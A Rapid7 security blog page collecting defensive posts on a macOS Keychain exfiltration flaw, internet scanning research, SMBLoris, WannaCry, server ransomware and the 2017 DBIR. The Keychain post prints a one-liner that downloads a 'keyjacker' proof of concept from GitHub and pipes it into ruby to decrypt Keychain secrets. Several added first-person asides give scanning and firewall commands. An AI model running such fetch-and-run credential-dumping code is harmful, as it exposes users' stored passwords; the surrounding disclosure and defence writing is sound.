Rapid7 Blog

boB Rudis  


The Wi-Fi KRACK Vulnerability: What You Need to Know

Everything you need to know about the recently disclosed KRACK vulnerability affecting Wi-Fi security protocols (WPA1 and WPA2).

macOS Keychain Security: What You Need To Know

If you follow the infosec twitterverse or have been keeping an eye on macOS news sites, you've likely seen a tweet (with accompanying video) from Patrick Wardle (@patrickwardle) that purports to demonstrate dumping and exfiltration of something called the "keychain" without an associated privilege escalation prompt. Patrick also has a more in-depth Q&A blog post about the vulnerability. Let's pull back a bit to provide sufficient background on why you should be concerned.

What is the macOS Keychain?

Without going into fine-grained detail, the macOS Keychain is a secure password management system developed by Apple. It's been around a while (back when capital letters ruled the day in "Mac OS") and can hold virtually anything. It's used to store website passwords, network share credentials, passphrases for wireless networks, and encrypted disk images; you can even use it to store notes securely. A more "TL;DR" version of that is "The macOS Keychain likely has the passwords to all your email, social media, banking and other websites—as well as for local network shares and your WiFi."

Most users access Keychain data through applications, but you can use the Keychain Access GUI utility to add, change, or delete entries. A sample dialog containing credentials for a fake application called (unimaginatively enough) "forexample" shows that the password is not displayed by default. You need to tick the "Show password:" box, a prompt will appear, and once you enter your system password you'll see the secret. That's a central part of the Keychain: you provide authority for accessing Keychain elements, even to the application that maintains the secrets for you.

Apple has also provided command-line access to work with the keychain via the security command. Here's what the listing looks like for this example:

$ security find-generic-password -s forexample
keychain: "/Users/me/Library/Keychains/login.keychain-db"
version: 512
class: "genp"
attributes:
    0x00000007 <blob>="forexample"
    0x00000008 <blob>=<NULL>
    "acct"<blob>="superseekrit"
    "cdat"<timedate>=0x32303137303932363230313035305A00  "20170926201050Z\000"
    "crtr"<uint32>=<NULL>
    "cusi"<sint32>=<NULL>
    "desc"<blob>=<NULL>
    "gena"<blob>=<NULL>
    "icmt"<blob>=<NULL>
    "invi"<sint32>=<NULL>
    "mdat"<timedate>=0x32303137303932363230313035305A00  "20170926201050Z\000"
    "nega"<sint32>=<NULL>
    "prot"<blob>=<NULL>
    "scrp"<sint32>=<NULL>
    "svce"<blob>="forexample"
    "type"<uint32>=<NULL>

Again, the secret data is not visible. As you may have surmised, Apple also provides programmatic access to the Keychain, and iOS, tvOS (etc.) all use a similar keychain for storing secrets. Before we jump into the news from September 25th, 2017, let's fire up Apple's Time Machine and go back about four years…

A (Very) Brief History of Keyjacking

Rapid7's own Erran Carey put together a proof-of-concept for "keyjacking" your Keychain a little over four years ago. If you run:

$ curl -L https://raw.github.com/erran/keyjacker/master/keyjacker.rb | ruby

you'll get prompted to unlock the keychain, which will enable the Ruby script to decrypt all the secrets. There's another related, older vulnerability that involved using a bit more AppleScript to trick the system into allowing unfettered access to Keychain data (that vulnerability no longer exists).

So, What's Different Now?

Patrick's video shows him running an unsigned application that was downloaded from a remote source. The usual macOS prompts come up to warn you that running said apps is a bad idea, and when you enable execution a dialog comes up with a button.
The user in the video (presumably Patrick) presses said button and some time passes, then a file with a full, cleartext export of the entire Keychain is scrolled through. As indicated, many bad things had to happen before the secrets were revealed:

- the Security System Preferences had to be modified to allow you to run unsigned third-party apps on your system
- you had to download a program from some site or load/run it from a USB (et al.) drive
- you had to say "OK" one more time to Apple's warning that what you are about to do is a bad idea

Sure, registered/signed apps could perform the same malicious function, but that's less likely since Apple can tie the signed app to the developer (or developer's system) that created it.

What Can I Do?

It looks like this vulnerability has been around for a while. macOS Sierra and the just-released High Sierra are both vulnerable to this attack; El Capitan is also reported to be vulnerable. Since you're likely running El Capitan or Sierra, upgrading to High Sierra isn't going to put you further at risk. In fact, High Sierra includes security patches and additional security features that make it worth the upgrade. Bottom line: don't let this vulnerability alone prevent you from upgrading to High Sierra if you're on El Capitan or Sierra. However, you might want to consider a completely fresh install versus an upgrade. Why? Read on!

macOS "power users" will not like the following advice, but you should consider performing a fresh install of High Sierra and starting from a completely fresh system, then migrating signed applications and data over. It's the next bit that really hurts, though. Don't install any unsigned third-party apps or any apps via MacPorts or Homebrew until Apple patches the vulnerability. Why? Well, there's a chance Patrick is not the only one who found this vulnerability, and attackers may try to work up their own exploits before Apple has a chance to release a fix. In fact, they may already have (which is one reason we suggested not just doing an upgrade). And, Apple is working on a fix — Patrick responsibly informed them — but there was no time to bake it in before this week's official release.

Using any unsigned third-party code could put your secrets at risk. You should also be wary of running signed code that you download outside the Mac App Store. Apple's gatekeeping is not perfect, but it's better than the total absence of gatekeeping that comes with downloads from uncontrolled websites.

Rapid7 researchers will be monitoring for other proof-of-concept (PoC) code that exploits this vulnerability (Patrick did not release his PoC code into the wild) and will be waiting and watching for Apple's first macOS patch release — they released 10.13.1 betas to developers today — to fix this critical issue. Keep watching the Rapid7 blog for updates!

Banner photo by Travis Wise • Used with permission (CC BY 2.0)
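Incidentally, if you want to poke at the Keychain from Terminal yourself, here is a minimal sketch using the same security command shown above (the service and account values are this post's own placeholders, and you'll get the same authorization prompts described earlier):

# Add a generic password item to the login keychain
$ security add-generic-password -a superseekrit -s forexample -w 'hunter2'

# Read the secret back; -w prints only the password, after you authorize access
$ security find-generic-password -s forexample -w
hunter2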

Data Mining the Undiscovered Country

Using Internet-scale Research Data to Quantify and Reduce Exposure

It's been a busy 2017 at Rapid7 Labs. Internet calamity struck swift and often, keeping us all on our toes and giving us a chance to fully test out the capabilities of our internet-scale research platform. Let's take a look at how two key components of Rapid7 Labs' research platform—Project Sonar and Heisenberg Cloud—came together to enumerate and reduce exposure over the past two quarters. (If reading isn't your thing, we'll cover this in person at today's UNITED talk.)

Project Sonar Refresher

Back in "the day" the internet really didn't need an internet telemetry tool like Rapid7's Project Sonar: what would eventually become the internet was small enough that it literally had a printed directory holding all the info about all the hosts and users. Fast-forward to Q1 2017, where Project Sonar helped identify a few hundred million hosts exposing one or more of 30 common TCP & UDP ports.

Project Sonar is an internet reconnaissance platform. We scan the entire public IPv4 address range (except for those in our opt-out list) looking for targets, then do protocol-level decomposition scans to try to get an overall idea of the "exposure" of many different protocols. In 2016, we began a re-evaluation and re-engineering of Project Sonar that greatly increased the speed and capabilities of our core research gathering engine. In fact, we now perform nearly 200 "studies" per month, collecting detailed information about the current state of IPv4 hosts on the internet. (Our efforts are not random, and there's more to a study than just a quick port hit; there's often quite a bit of post-processing engineering for new scans, so we don't just call them "scans.")

Sonar has been featured in over 20 academic papers (see for yourself!) and is a core part of the foundation for many popular talks at security conferences (including 3 at BH/DC in 2017). We share all our scan data through a research partnership with the University of Michigan — https://scans.io. Keep reading to see how you can use this data on your own to help improve the security posture of your organization.

Cloudy With A Chance Of Honeypots

Project Sonar enables us to actively probe the internet for data, but this provides only half the data needed to understand what's going on. Heisenberg Cloud is a sensor network of honeypots developed by Rapid7 that is hosted in every region of every major cloud provider. Heisenberg agents can run multiple types and flavors of honeypots, from simple tripwires that enable us to enumerate activity to more stealthy ones that are designed to blend in by mimicking real protocols and servers. All of these honeypot agents are managed through traditional, open source cloud management tools. We collect all agent-level log data using Rapid7's InsightOps tool and collect all honeypot data—including raw PCAPs—centrally on Amazon S3. We have Heisenberg nodes appearing to be everything from internet cameras to MongoDB servers and everything in between.

But we're not just looking for malicious activity. Heisenberg also enables us to see cloud and internet service "misconfigurations"—i.e., legit, benign traffic that is being sent to a node that is no longer under the control of the sending organization but likely was at some point.
We see database queries, API calls, authenticated sessions and more, and this provides insight into how well organizations are (or aren't) configuring and maintaining their internet presence.

Putting It All Together

We convert all our data into a column-storage format called "parquet" that enables us to use a wide array of large-scale data analysis platforms to mine the traffic. With it, we can cross-reference Sonar and Heisenberg data—along with data from feeds of malicious activity or even, say, current lists of digital coin mining bots—to get a pretty decent picture of what's going on. This past year (to date), we've publicly used our platform to do everything from monitoring Mirai (et al.) botnet activity to identifying and quantifying (many) vulnerable services to tracking general protocol activity and exposure before and after the Shadow Brokers releases. Privately, we've used the platform to develop custom feeds for our Insight platform that help users identify, quantify and reduce exposure. Let's look into a few especially fun and helpful cases we've studied.

Sending Out An S.O.S.

Long-time readers of the Rapid7 blog may remember a post we did on protestors hijacking internet-enabled devices that broadcasters use to get signals to radio towers. We found quite a few open and unprotected devices. What we didn't tell you is that Rapid7's Rebekah Brown worked with the National Association of Broadcasters to get the word out to vulnerable stations. Within 24 hours the scope of the issue was reduced by 50%, and now only a handful (~15%) remain open and unprotected. This is an incredible "win" for the internet, as exposure reduction like this is rarely seen.

We used our Sonar HTTP study to look for candidate systems and then performed a targeted scan to see if each device was — in fact — vulnerable. Thanks to the aforementioned re-engineering efforts, these subsequent scans take between 30 minutes and three hours (depending on the number of targets and the complexity of the protocol decomposition). That means, when we are made aware of a potential internet-wide issue, we can get active, current telemetry to help quantify the exposure and begin working with CERTs and other organizations to help reduce risk.

Internet of Exposure

It'd be too easy to talk about the Mirai botnet or stunt-hacking images from open cameras. Let's revisit the exposure of a core component of our nation's commercial backbone: petroleum. Specifically, the gas we all use to get around. We've talked about it before, and it's hard to believe (or perhaps not, in this day and age) that such a clunky device can be so exposed. We've shown you we can count these IoThings, but we've taken the ATG monitoring a step further to show how careless configurations could possibly lead to exposure of important commercial information. Want to know the median number of gas tanks at any given petrol station? We've got an app for that: most stations have 3-4 tanks, but some have many more. This can be sliced-and-diced by street, town, county and even country, since the vast majority of devices provide this information with the tank counts. How about how much inventory currently exists across the stations? We won't go into the economic or malicious uses of this particular data, but you can likely ponder that on your own. Despite previous attempts by researchers to identify this exposure—with the hopeful intent of raising enough awareness to get it resolved—we continue to poke at this and engage when we can to help reduce this type of exposure.
Think back on this whenever your organization decides to deploy an IoT sensor network and doesn't properly risk-assess the exposure depending on the deployment model and what information is being presented through the interface. But these aren't the only exposed things. We did an analysis of our port 80 HTTP GET scans to try to identify IoT-ish devices sitting on that port, and it's a mess. You can explore all the items we found here, but one worth calling out is a set of 251 buildings—yes, buildings—with their entire building management interface directly exposed to the internet, many without authentication and not even trying to be "sneaky" and use a different port than port 80. It's vital that you scan your own perimeter for this type of exposure (not just building management systems, of course) since it's far easier for something to slip onto the internet than one would expect.

Wiping Away The Tears

Rapid7 was quick to bring hype-free information and help for the WannaCry "digital hurricane" this past year. We've migrated our WannaCry efforts over to focused reconnaissance of related internet activity post-Shadow Brokers releases. Since WannaCry, we've seen a major uptick in researchers and malicious users looking for SMB hosts (we've seen more than that, but you can read our 2017 Q2 Threat Report for more details). As we work to understand what attackers are doing, we are developing different types of honeypots to enable us to analyze—and perhaps even predict—their intentions. We've done even more than this, but hopefully you get an idea of the depth and breadth of analyses that our research platform enables.

Take Our Data...Please!

We provide some great views of our data via our blog and in many reports. But YOU can make use of our data to help your organization today. Sure, Sonar data is available via Metasploit (Pro) via the Sonar C, but you can do something as simple as:

$ curl -o smb.csv.gz https://scans.io/data/rapid7/sonar.tcp/2017-08-16-1502859601-tcp_smb_445.csv.gz
$ gzcat smb.csv.gz | cut -d, -f4,4 | grep MY_COMPANY_IP_ADDRESSES

to see if you're in one of the study results. Some studies you really don't want to show up in include SMB, RDP, Docker, MySQL, MS SQL, and MongoDB. If you're there, it's time to triage your perimeter and work on improving deployment practices. You can also use other Rapid7 open source tools (like dap) and tools we contribute to (such as the ZMap ecosystem) to enrich the data and get a better picture of exposure, focusing specifically on your organization and threats to you.

Fin

We've got more in store for the rest of the year, so keep an eye (or RSS feed slurper) on the Rapid7 blog as we provide more information on exposure. You can get more information on our studies and suggest new ones via research@rapid7.com.
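As a slightly more robust variant of that check (a sketch of my own, assuming the same Sonar SMB study file and using the documentation prefix 198.51.100. as a stand-in for your own address space):

# Pull the Sonar SMB (445) study and extract just the IP column (field 4)
$ curl -so smb.csv.gz https://scans.io/data/rapid7/sonar.tcp/2017-08-16-1502859601-tcp_smb_445.csv.gz
$ gzcat smb.csv.gz | cut -d, -f4 | sort -u > smb_ips.txt

# Count any hits inside your prefix (198.51.100. is a placeholder)
$ grep -c '^198\.51\.100\.' smb_ips.txt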

SMBLoris: What You Need To Know

What's Up?

Astute readers may have been following the recent news around "SMBLoris" — a proof-of-concept exploit that takes advantage of a vulnerability in the implementation of SMB services on both Windows and Linux, enabling attackers to "kill you softly" with a clever, low-profile application-level denial of service (DoS). This vulnerability impacts all versions of Windows and Samba (the Linux software that provides SMB services on that platform), and Microsoft has stated that it has no current intention to provide a fix for the issue.

Researchers Sean Dillon (Twitter: @zerosum0x0) and Jenna Magius (Twitter: @jennamagius) found the original vulnerability in June (2017) and noted that it was an apparent bug in SMBv1 (you'll remember that particular string of letters from both the WannaCry and "NotPetya" outbreaks this year), and Jenna Magius was one of the researchers who more recently noted that all Windows systems — including Windows 10 — exposing port 445 are vulnerable (i.e. disabling SMBv1 won't stop attacks).

This means that the current situation is that all Windows systems exposing port 445 and the majority of Linux systems exposing port 445 are vulnerable to this application-level denial of service attack. If the attack is successful, the system being attacked will need to be rebooted and will still be vulnerable. Researchers have noted that this vulnerability is similar to one from 2009 — Slowloris — that impacted different types of systems with the same technique. It appears, however, that SMBLoris can have a much faster negative impact, even on Windows systems with robust hardware configurations.

Is The World Ending?

Yes…in approximately 7.5 billion years, when our Sun is estimated to turn into a dwarf star. However, here are the facts about this vulnerability:

- It is not, itself, "wormable" as seen with previous SMB-related attacks this year.
- It is not "ransomware".
- There is currently no indication of active exploitation (we and other researchers are monitoring for this and will provide additional communications & guidance if we discover widespread SMBLoris probes or attacks).
- It is not any more destructive to a single system than what might happen if you accidentally turned off said system without shutting it down properly.
- If you have mobile endpoints (i.e. laptops) that connect to diverse networks, or SMB servers exposing port 445 to the internet, then those systems are vulnerable to this SMBLoris exploit and can easily be (temporarily) taken down by attackers.
- Your internal systems are also vulnerable to this attack, as most organizations do not implement granular controls over port 445 system-to-system communications. This means that an attacker who compromises a system within your network can launch SMBLoris attacks against any assets exposing port 445.

So, while the world is generally safe, there is room for reasoned caution.

What Can We Do?

If you own one or more of the ~4 million internet endpoints exposing this vulnerable protocol on port 445 (as noted in our 2017 Q2 Threat Report), then you should take steps to remove those systems from the internet (it's never a good idea to expose this service directly to the internet anyway). If you have an active, mobile user base, then those devices should be configured to block access to port 445 when not on the corporate network.
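For illustration (these exact rules are a minimal sketch of mine, not from the original post), host-level blocks for TCP/445 look something like this on Windows and Linux:

# Windows (run as Administrator): block inbound TCP/445 with the built-in firewall
netsh advfirewall firewall add rule name="Block inbound SMB" dir=in action=block protocol=TCP localport=445

# Linux: drop inbound TCP/445 with iptables
iptables -A INPUT -p tcp --dport 445 -j DROP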
Even then, it's a good idea to have well-crafted host firewall rules to restrict access on this port. You should also be monitoring both your operations logs/alerts and help desk tickets for unusual reports of random system crashes and reboots, and handling them through your standard incident response processes.

What Might Attackers Do With SMBLoris?

Denial of service and distributed denial of service (DDoS) attacks are generally used to disable services for:

- "fun"/retaliation/ideology
- financial gain (e.g. extortion), and
- distraction (i.e. keeping operations teams and incident responders busy to cover the tracks of other malicious behaviour)

The CVE Details site shows over 60,000 application/operating system DoS vulnerabilities spread across hundreds of vendor products. It is highly likely that you have many of these other DoS vulnerabilities present on both your internet-facing systems and intranet systems. In other words, attackers have a plethora of targets to choose from when deciding to use application- or OS-level DoS attacks against an organization.

What makes SMBLoris a bit more insidious, and a potential go-to vulnerability for attackers, is that it makes it easy to perform nigh-guaranteed widespread DDoS attacks against homogeneous networks exposing port 445. So, while you should not be panicking, you should be working to understand your exposure, creating and deploying configurations to mitigate said exposure, and performing the monitoring outlined above.

If you do not have a threat exercise scenario for application-level DDoS attacks or do not have an incident response plan for such an attack, now would be a great time to work on that. You can use this run book by the Financial and Banking Information Infrastructure Committee (FBIIC) as a starting point or reference. As stated earlier, we are on the lookout for adversarial activity surrounding SMBLoris, and will update the community if and when we have more information.

(Banner image by Jonas Eklundh)

(Server) Ransomware in the Cisco 2017 Midyear Cybersecurity Report: Rapid7's Readout

It's summer in the northern hemisphere, and many folks are working their way through carefully crafted reading lists, rounding out each evening exploring fictional lands or investigating engrossing biographies. I'm hoping that by the end of this post you'll be adding another item to your "must read" list — a tome whose pages are bursting with exploits carried out by crafty, international adversaries and stories of modern-day sleuths on the hunt for those who would seek their fortunes by preying on the innocent and ill-prepared. "What work is this?!" you ask (no doubt with eager anticipation). Why, it's none other than the Cisco 2017 Midyear Cybersecurity Report (MCR)!

This year, Rapid7—along with nine other organizations—contributed content for Cisco's mid-year threat landscape review, and it truly is a treasure trove of information with data, intelligence and guidance from a wide range of focus areas across the many disciplines of cybersecurity. Avid readers of the R7 blog likely remember our foray into "DevOps" server ransomware earlier this year. We've been using Project Sonar to monitor MongoDB, CouchDB, Elasticsearch and Docker—what we're calling "DevOps" servers—since January, and we've provided a deep dive into the state of these services in the Cisco 2017 MCR. You should read the "DevOps" section within the context of the entire report, as other sections provide both reinforcement and additional adversary context to our findings, but we wanted to show a small extension of the MongoDB server status here, since we've performed a few more scans since we provided the research results in the MCR.

There are two main takeaways from the current state of MongoDB (and the other "DevOps" servers).

First: Good show! While there are still thousands of MongoDB (and CouchDB, and Elasticsearch, and Docker, etc.) servers exposed to the internet without authentication, the numbers are generally decreasing or holding steady (discrepancies per scan are expected, since mining the internet for data is notoriously fraught with technical peril), and it seems attackers have realized that the remaining instances out there are likely non-production, forgotten or abandoned systems. It would be great if the owners of these systems yanked them off of the internet, but the issue appears to have been (at least temporarily) abated.

Second: Be vigilant! Attackers have had ample opportunity to fine-tune their "DevOps" discovery kits as well as their ransom/destruction kits. We've all witnessed just how easy it is for our adversaries to gain an internal foothold when they believe it will be beneficial (ref: WannaCry and Petya-not-Petya). It truly is only a matter of time before the techniques they've perfected on the open internet make their way into our gilded internal network cages. It would be very prudent to take this summer lull to scan for open or weak-credentialed "DevOps" servers in your own environments and make sure they're properly secured before you find yourself feeding bills into a Bitcoin ATM when you should be basking in the sun on the beach.

The Cisco 2017 MCR is an absolute "must add" to the reading lists of IT and cybersecurity professionals, and we hope you take some time to digest it over the coming days/weeks.
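If you want to act on that advice, here is a minimal sketch of a quick internal sweep for the default ports of the services named above (my own illustration, assuming nmap is available and using the private range 10.0.0.0/24 as a placeholder):

# Sweep for MongoDB (27017), CouchDB (5984), Elasticsearch (9200) and the
# unauthenticated Docker API (2375) listening on internal hosts
$ nmap -Pn -p 27017,5984,9200,2375 --open 10.0.0.0/24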

Wanna Decryptor (WNCRY) Ransomware Explained

Mark the date: May 12, 2017. This is the day the "ransomworm" dubbed "WannaCry" / "Wannacrypt" burst — literally — onto the scene, with one of the initial targets being the British National Health Service. According to The Guardian, the "unprecedented attack… affected 12 countries and at least 16 NHS trusts in the UK, compromising IT systems that underpin patient safety. Staff across the NHS were locked out of their computers and trusts had to divert emergency patients." A larger estimate by various cybersecurity firms indicates that over 70 countries have been impacted in some way by the WannaCry worm. As of this post's creation time, a group with the Twitter handle @0xSpamTech has claimed responsibility for instigating the attack, but this has not yet been confirmed.

What is involved in the attack, what weakness(es) and systems does it exploit, and what can you do to prevent or recover from this attack? The following sections will dive into the details and provide guidance on how to mitigate the impact of future attacks.

What is "Ransomware"?

Ransomware is "malicious software which covertly encrypts your files – preventing you from accessing them – then demands payment for their safe recovery. Like most tactics employed in cyberattacks, ransomware attacks can occur after clicking on a phishing link or visiting a compromised website." (https://www.rapid7.com/solutions/ransomware/)

However, WannaCry deviates from the traditional ransomware definition by including a component that is able to find vulnerable systems on a local network and spread that way as well. This type of malicious software behavior is called a "worm", and the use of such capabilities dates back to 1988, when the Morris Worm spread across the internet (albeit a much smaller neighborhood at the time). Because WannaCry combines two extremely destructive capabilities, it has been far more disruptive and destructive than previous cases of ransomware that we've seen over the past 18-24 months. While the attackers are seeking ransom — you can track payments to their Bitcoin addresses:

115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw
13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94

here: https://blockchain.info/address/ — there have been reports of this also corrupting drives, adding a destructive component as well as a ransom-recovery component to the attack.

What Systems Are Impacted?

WannaCry only targets Microsoft Windows systems and is known to impact the following versions:

- Microsoft Windows Vista SP2
- Windows Server 2008 SP2 and R2 SP1
- Windows 7
- Windows 8.1
- Windows RT 8.1
- Windows Server 2012 and R2
- Windows 10
- Windows Server 2016
- Windows XP

However, all versions of Windows are likely vulnerable, and on May 13, 2017 Microsoft issued a notification that included links to patches for all impacted Windows operating systems — including Windows XP. As noted, Windows XP is impacted as well. That version of Windows still occupies a 7-10% share of usage (as measured by NetMarketShare), and this usage figure likely does not include endpoint counts from countries like China, which have significant use of "aftermarket" versions of Windows XP and other Windows systems, making them unpatchable.

The "worm" component takes advantage of a Remote Code Execution (RCE) vulnerability that is present in the part of Windows that makes it possible to share files over the network (known as "Server Message Block" or SMB). Microsoft released a patch — MS17-010 — for this vulnerability on March 14th, 2017, prior to the release of U.S.
National Security Agency (NSA) tools (EternalBlue / DoublePulsar) by a group known as the Shadow Brokers. Rapid7's Threat Intelligence Lead, Rebekah Brown, wrote a breakdown of this release in a blog post in April. Vulnerability detection tools, such as Rapid7's Metasploit, have had detection capabilities for this weakness for a while, with the most recent Metasploit module being updated on April 30, 2017. This ransomworm can be spread by someone being on public Wi-Fi or an infected firm's "guest" WiFi and then taking an infected-but-not-fully-encrypted system to another network. WannaCry is likely being spread, still, by both the traditional phishing vector as well as this network worm vector.

What Can You Do?

- Ensure that all systems have been patched against MS17-010 vulnerabilities.
- Identify any internet-facing systems that have not been patched and remediate as soon as possible.
- Employ network and host-based firewalls to block TCP/445 traffic from untrusted systems. If possible, block 445 inbound to all internet-facing Windows systems.
- Ensure critical systems and files have up-to-date backups. Backups are the only full mitigation against data loss due to ransomware.

NOTE: The Rapid7 Managed Detection & Response (MDR) SOC has developed detection indicators of compromise (IOCs) for this campaign; however, we are only alerted once the malware executes on a compromised system. This is not a mitigation step.

UPDATE - May 15, 2017: For information on how to scan for, and remediate, MS17-010 with Nexpose and InsightVM, please read this blog.

A Potentially Broader Impact

We perform regular SMB scans as a part of Project Sonar and detected over 1.8 million devices responding to a full SMB connection in our May 3, 2017 scan. Some percentage of these systems may be Linux/UNIX servers emulating the SMB protocol, but it's likely that a large portion are Windows systems. Leaving SMB (via TCP port 445) open to the internet is also a sign that these systems are not well maintained and are susceptible to attack. Rapid7's Heisenberg Cloud — a system of honeypots spread throughout the internet — has seen a recent spike in probes for systems on port 445 as well.

Living With Ransomware

Ransomware has proven to be an attractive and lucrative vector for cybercriminals. As stated previously, backups, along with the ability to quickly re-provision/image an impacted system, are your only real defenses. Rapid7 has additional resources available for you to learn more about dealing with ransomware:

Understanding Ransomware: https://www.rapid7.com/resources/understanding-ransomware/
Ransomware FAQ: /2016/03/22/ransomware-faq-avoiding-the-latest-trend-in-malware

If you'd like more information on this particular ransomworm as seen by Project Sonar or Heisenberg Cloud, please contact research [at] rapid7 [dot] com. Many thanks to the many contributors across Rapid7 who provided vital information and content for this post. For more information and resources on WannaCry and ransomware, please visit this page.
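One quick way to act on the first two recommendations above is an Nmap check (a minimal sketch of mine, assuming a recent Nmap build that ships the smb-vuln-ms17-010 script; 192.0.2.0/24 is a placeholder range):

# Report hosts whose SMB service is still vulnerable to MS17-010
$ nmap -Pn -p445 --script smb-vuln-ms17-010 192.0.2.0/24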

2017 Verizon Data Breach Report (DBIR): Key Takeaways

The much-anticipated, tenth-anniversary edition of the Verizon DBIR has been released (http://www.verizonenterprise.com/verizon-insights-lab/dbir/2017/), once again providing a data-driven snapshot into what topped the cybercrime charts in 2016. There are just under seventy-five information-rich pages to go through, with topics ranging from distributed denial-of-service (DDoS) to ransomware, prompting us to spin a reprise edition of last year's DBIR field guide (/2016/04/29/the-2016-verizon-data-breach-investigations-report-the-defenders-perspective).

Before we bust out this year's breach-ography, let's set a bit of context. The Verizon DBIR is digested by a diverse community, but the lessons found within are generally aimed at defenders in organizations who are faced with the unenviable task of detecting and deterring the daily onslaught of attacks and attackers. This post is also aimed at that audience. As you go through the Verizon DBIR, there should be three guiding principles at work:

- How do I use this information to improve my organization's threat response time?
- How do I use this information to improve my resistance strength (http://www.fairinstitute.org/blog/threat-capability-and-resistance-strength-a-weight-on-a-rope)?
- How do I use this information to increase the time it takes attackers to accomplish their goals?

Time to fire up the jukebox and see what's inside.

The Detection-Deficit is Dead…Long Live the Defender's Differential!

The first chart I always went to in the DBIR was the Detection-Deficit chart. Said chart "compared the percentage of breaches where the time-to-compromise was days or less against the percentage of breaches where the time-to-discovery was days or less" (VZDBIR, pg 8). It's also no longer an artifact in the Verizon DBIR. The Verizon Security Research team provided many good reasons for not including the chart in the report, and also noted several caveats about the timings that you should take time to consider. But you still need to be tracking similar metrics in your own organization to see if things are getting better or worse (things rarely hold steady in infosec land).

We've taken a cue from the DBIR and used their data to give you two new metrics to track: the "Exfiltration-Compromise Differential" and the "Containment-Discovery Differential". The former chart shows a band created by comparing the percentage of breaches where exfiltration (you can substitute or add in other accomplished attacker goals) was in "days or less" (in other words, less than seven days) to those where initial compromise was "days or less". This band should be empty (all attacker events took days or longer) or as tiny as possible. The latter does the same to compare the defender's ability to detect and contain attacker activity. That band needs to be as YUGE as you can make it (aligned to your organization's risk and defense spending appetites). As noted in the Verizon DBIR, things aren't getting much better (or worse) when looked at in aggregate, but I'm hopeful that organizations can make progress in these areas as tools, education, techniques and processes continue to improve.

Some other key takeaways in the "Breach Trends" section: the balance between External and Internal actors has ebbed and flowed at about the same pace for the past 7 years, meaning Figure 2 does not validate the ever-present crusade by your Internal Audit department to focus solely on defending against rogue sysadmins.
There is a cautionary tale here, though, in that many of the attacks marked as "internal" were actually committed by external attackers who used legit credentials to impersonate internal users. We have finally reached the Threat Action Trifecta stage, with Social, Malware and Hacking reigning supreme (and likely to do so for some time to come). Financial gain and stealing secrets remain primary motives (and defending against those who seek your secrets may become job #1 over the coming years if Figure 3 continues the trend). Team DBIR also provided a handy punch-card for you in Figure 9: it's your "at-a-glance" key to the 2016 chart-toppers by industry. Keep it handy as you sit in your post-DBIR-launch roadmap adjustment meetings (you do have those, right?).

The Secret Life of Enterprise Vulnerability Management (Guest starring IoT)

Verizon has many partners who provide scads of vulnerability data, and the team took a very interesting look at patching in the intro section preceding the individual industry dives. Verizon gives a solid, technical explanation of its patching chart, so we'll focus on how you should benchmark your own org against it. Find your industry (NAICS codes are here: https://www.census.gov/eos/www/naics/ but you can also Google™ "COMPANY_NAME NAICS" and usually get a quick result), then hit up your vulnerability and patch management dashboards to see if you meet or beat expectations. If you're a college, do you patch more than 12% of vulns in 12 weeks' time? If you're in a hospital, do you meet the 77% bar?

The chart is based on real data from many organizations. You may have some cognitive dissonance reading it, because we constantly hear how awesome well-resourced financial institutions are at IT & security, and the converse for industries such as Healthcare. One way to validate these findings is to start tracking this data internally, then getting your ISAC partners (you are aligned with one — or more — information sharing and analysis centers, right?) to do the same and compare notes a few times a year. You also need to define your own targets and use your hit/miss ratio as a catalyst for process improvement (or funding for better tooling).

But wait…there's more! Keep one finger on page 13 and then flip to Appendix B to get even more information on vulnerability management, including one chart in particular. Network ops folks patching on 90-day cycles shouldn't really surprise anyone — we need to keep those bits and bytes flowing, and error-free high-availability switchover capability is expensive — but take a look at the yellow-ish line. First, do you even track IoT (Internet of Things, i.e. embedded) patching? And, if you do — or when you start to, after reading this — will you strive to do better than "take 100 days to not even get half the known vulns patched"? IoT is a blind spot in many (most) organizations, and this chart is a great reminder that you need to care about, inventory/locate, and track IoT in your environment.

Industrial Development

Unfortunately, digesting the various Industry sections of the Data Breach Investigations Report is an exercise that you must — dear reader — undertake on your own, but they are a good resource to have for planning or a security architecture development session.
Find your industry (see the previous section in this post), note the breach frequency (they'll likely have fixed the bug in the Accommodation section by the time our blog post drops), top patterns, actor information and compromise targets, and compare your 2016 to the overall industry 2016. Note the differences (or similarities) and adjust accordingly. The DBIR team provides unique details and content in each industry section to help you focus on the differentials (the unique incident characteristics that made one industry different from another). As you go through each, do not skip over the caveats. The authors of the report spend a great deal of time sifting through details and will often close out a section with important information that may change your perspective on a given area, such as this closing caveat in the Retail section: "This year we do not have any large retailers in the Point of Sale Intrusions pattern, which is hopefully an indicator of improvements and lessons learned. We are interested in finding out if smaller retailers also learned this lesson, or if single small breaches just aren't making it into our dataset."

The Last Waltz: Dancing Through Incident Classification Patterns

We'll close with an overview of the bread-and-butter (or, perhaps, avocado toast?) of the DBIR: the incident classification patterns. Figures 33 & 34 provide the necessary contextual overview: breaches hurt, but incidents happen with more regularity, so you need to plan for both. First, compare the overall prevalence of each category to what your own org saw in 2016 so you understand your own, unique view. Next, make these sections actionable. One of the best ways to get the most out of the data in each of the Patterns sections is to take one or two key details from each that matter to your industry (they align the top ones in each category) and design either tabletop or actual red-team exercise scenarios that your org can run through. For example, design a scenario where attackers have obtained a recent credential dump and have targeted your employee HR records (yes, I took the easy one from Figure 52, page 58). MITRE has a decent "Cyber Exercise Playbook" (https://www.mitre.org/sites/default/files/publications/pr_14-3929-cyber-exercise-playbook.pdf) you can riff off of if you don't have one of your own to start with.

Coda

This is the first year Rapid7 has been a part of the DBIR corpus, and we want to end with a shout-out to the entire DBIR team for taking the time to walk through our incident/breach-data contributions with us. We look forward to contributing more — and more diverse — data in reports to come.

ON-AIR: Broadcasting Insecurity

Note: Rebekah Brown was the astute catalyst for the search for insecure broadcast equipment and the major contributor to this post.

Reports have surfaced recently of local radio station broadcasts being hijacked and used to play anti-Donald Trump songs (https://www.rt.com/viral/375935-trump-song-hacked-radio/). The devices that were taken over are Barix Exstreamer systems, though there are several other brands of broadcasters, including Pkyo, that are configured and set up the same way as these devices and would also be vulnerable to this type of hijacking. Devices by these manufacturers work in pairs. In the most basic operating mode, one encodes and transmits a stream over an internal network or over the internet, and the other receives it and blasts it to speakers or to a transmitter. Because they work in tandem, if you can gain access to one of these devices, you have information about the other one, including the IP address and port(s) it's listening on. After seeing the story, we were curious about the extent of the exposure.

The View from the Control Room

